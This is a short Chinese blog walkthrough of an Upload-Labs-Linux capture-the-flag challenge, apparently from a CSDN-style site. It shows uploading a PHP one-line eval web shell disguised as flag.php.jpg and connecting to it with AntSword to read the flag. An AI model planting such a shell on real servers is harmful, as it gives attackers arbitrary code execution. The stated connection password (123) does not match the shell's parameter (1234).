Upload-Labs-Linux

lin__ying2023-12-25 19:43

题目

1.打开靶机

随便上传一个图片,查看get请求发现**/upload/XXX.jpg**

2.创建一个脚本文件

命名为flag.php.jpg,并上传

脚本文件内容:

<?php @eval($_POST[1234])?>

3上传后复制文件get请求的链接并打开蚁剑

连接密码为123

双击链接

4,查找'/'在最下面找到flag文件

5,打开文件得到flag

相关推荐
谈不譚网安7 小时前
Raven2
web安全·网络安全
网安INF12 小时前
网络攻防技术:网络安全攻击概述
安全·web安全·网络安全·网络攻防
emma羊羊17 小时前
【文件读写】18,21关
网络安全·upload
电子科技圈2 天前
芯科科技第三代无线SoC现已全面供货
嵌入式硬件·mcu·物联网·网络安全·智能家居·智能硬件·iot
Bruce_Liuxiaowei2 天前
内网连通性判断:多协议检测方法与应用
运维·安全·网络安全
emma羊羊2 天前
【文件读写】图片木马
linux·运维·服务器·网络安全·靶场
介一安全3 天前
资产信息收集与指纹识别:HTTPX联动工具实战指南
网络安全·安全性测试·httpx·安全工具
unable code3 天前
攻防世界-Web-easyupload
网络安全·web·ctf
Bruce_Liuxiaowei3 天前
MQTT协议在物联网环境中的安全风险与防范指南
运维·网络·物联网·安全·网络安全
witkey_ak98964 天前
网安面试题收集(1)
网络安全
热门推荐
01BongoCat - 跨平台键盘猫动画工具02两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答03GitHub 镜像站点04UV安装并设置国内源05智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践0646个Nano-banana 精选提示词,持续更新中07Cursor Plan Mode:AI 终于知道先想后做了08Linux下V2Ray安装配置指南09GitLab 零基础入门指南:从安装到项目管理全流程10一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示